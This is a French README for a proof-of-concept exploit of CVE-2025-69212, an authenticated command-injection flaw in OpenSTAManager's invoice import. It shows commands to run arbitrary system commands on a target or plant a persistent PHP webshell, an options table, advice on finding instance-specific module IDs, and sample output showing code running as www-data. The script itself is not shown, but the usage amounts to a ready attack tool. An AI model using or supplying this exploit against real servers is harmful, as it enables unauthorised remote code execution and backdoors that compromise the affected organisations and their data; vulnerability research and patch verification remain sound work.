
CVE-2025-69212 - OpenSTAManager Injection de commandes système PoC
Installer les dépendances :
pip install -r requirements.txt
Exécuter une commande unique et afficher sa sortie :
python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' -c 'id'
Déposer un webshell PHP persistant à la place :
python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' --shell
| Option | Description |
|---|
-u, --url | URL de base de l'instance cible |
-U, --username | Nom d'utilisateur pour l'authentification |
-P, --password | Mot de passe pour l'authentification |
-c, --command | Commande à exécuter, la sortie est sauvegardée dans pwn_out.txt |
--shell | Dépose un webshell PHP à files/shell.php au lieu d'exécuter une commande unique |
--id-module | ID du module pour la fonction d'import de factures (par défaut : 14) |
--id-plugin | ID du plugin pour la fonction d'import de factures (par défaut : 48) |
id_module et id_plugin sont spécifiques à l'instance. Si les valeurs par défaut ne fonctionnent pas, connectez-vous à l'interface web de la cible, naviguez vers la fonction d'import de factures électroniques, et vérifiez les paramètres de la requête dans l'onglet réseau de votre navigateur.
$ python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' -c 'id'
[*] Logging in as admin ...
[+] Authenticated.
[*] Building payload to run: id
[*] Uploading exploit ZIP to id_module=14 id_plugin=48 ...
[*] Server responded: HTTP 500 (500 after command execution is expected)
[*] Fetching command output from http://target.com/files/pwn_out.txt ...
[+] Command output:
--------------------------------------------------
uid=33(www-data) gid=33(www-data) groups=33(www-data)
--------------------------------------------------